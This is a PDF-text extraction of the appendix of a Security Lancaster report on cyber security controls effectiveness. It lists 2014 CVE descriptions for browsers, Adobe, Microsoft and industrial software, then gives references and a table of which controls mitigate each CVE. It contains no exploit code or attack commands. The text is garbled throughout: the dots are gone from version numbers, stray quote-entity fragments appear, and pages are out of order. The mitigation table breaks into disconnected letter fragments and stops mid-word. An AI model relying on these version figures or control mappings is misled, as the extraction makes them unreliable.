CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
